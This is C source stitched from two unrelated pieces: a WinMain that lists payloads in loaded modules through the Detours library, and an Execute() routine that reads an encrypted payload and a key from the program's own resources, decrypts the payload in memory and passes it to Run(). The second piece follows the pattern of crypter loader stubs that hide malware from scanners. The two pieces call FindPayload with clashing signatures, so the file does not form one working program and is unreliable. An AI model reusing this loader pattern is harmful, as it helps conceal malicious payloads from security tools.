/*
 * WinMain: report the payload found in this executable, then in every module
 * returned by DetourEnumerateModules().  EDll1Function()..EDll3Function() are
 * called first (presumably so their DLLs are loaded before the enumeration;
 * confirm against the DLL sources).  Always returns 0.
 */
int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR lpszCmdLine, int nCmdShow)
{
    (void)hinst;
    (void)hprev;
    (void)lpszCmdLine;
    (void)nCmdShow;

    printf("Source .EXE:\n");
    FindPayload(NULL);
    printf("\n");

    printf("DLL and EXE binaries loaded:\n");
    EDll1Function();
    EDll2Function();
    EDll3Function();

    /* Walk the module list; DetourEnumerateModules(NULL) yields the first one. */
    HINSTANCE hModule = DetourEnumerateModules(NULL);
    while (hModule != NULL) {
        FindPayload(hModule);
        hModule = DetourEnumerateModules(hModule);
    }

    /* Condition presumably never holds at runtime; the call is kept so that
     * gdi32.dll is force-loaded (per the original comment). */
    if ((PVOID)hinst == (PVOID)lpszCmdLine) {
        DispatchMessage(NULL);
    }

    return 0;
}
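/*
 * Execute: locate the payload and key resources, decrypt a heap copy of the
 * payload with the key and pass it to Run().
 *
 * Returns Run()'s result, or FALSE when a resource lookup or the buffer
 * allocation fails.  The decryption buffer is released on every path that
 * allocated it; the original leaked it when the key resource lookup failed.
 */
BOOL Execute(void)
{
    PRINT_INFO("Retrieving payload resource.\n");
    LPVOID lpPayload = NULL;
    SIZE_T nPayloadSize = 0;
    if (!FindPayload(&lpPayload, &nPayloadSize, RES_ID_PAYLOAD)) {
        return FALSE;
    }

    PRINT_INFO("Allocating payload buffer for decryption.\n");
    LPVOID lpDecryptPayload = MyHeapAlloc(nPayloadSize);
    if (!lpDecryptPayload) {
        PRINT_ERROR("Failed to allocate buffer: <0x%08x>\n", GetLastError());
        return FALSE;
    }
    memcpy(lpDecryptPayload, lpPayload, nPayloadSize);

    PRINT_INFO("Retrieving key resource.\n");
    LPBYTE lpKey = NULL;
    SIZE_T nKeySize = 0;
    BOOL bRet = FALSE;
    if (!FindPayload(&lpKey, &nKeySize, RES_ID_KEY)) {
        goto cleanup;   /* lpDecryptPayload is already allocated: free it. */
    }

    /* Hex dump of the key, 16 bytes per row with a gap after the 8th byte.
     * The inner loop is bounded by nKeySize so a key whose length is not a
     * multiple of 16 no longer reads past the end of the resource.
     * NOTE(review): this echoes key material to the console; consider
     * restricting it to diagnostic builds. */
    PRINT_INFO("Extracted key:\n");
    for (SIZE_T i = 0; i < nKeySize; i += 16) {
        for (SIZE_T j = 0; j < 16 && i + j < nKeySize; j++) {
            if (j == 8) {
                PrintColour(CONSOLE_PURPLE, " ");
            }
            PrintColour(CONSOLE_PURPLE, "%02x ", lpKey[i + j]);
        }
        puts("");
    }

    PRINT_INFO("Decrypting payload.\n");
    DecryptPayload(lpDecryptPayload, nPayloadSize, lpKey, nKeySize);
    bRet = Run(lpDecryptPayload, nPayloadSize);

cleanup:
    /* Deallocate decrypted payload on both the normal and the key-failure path. */
    MyHeapFree(lpDecryptPayload);
    return bRet;
}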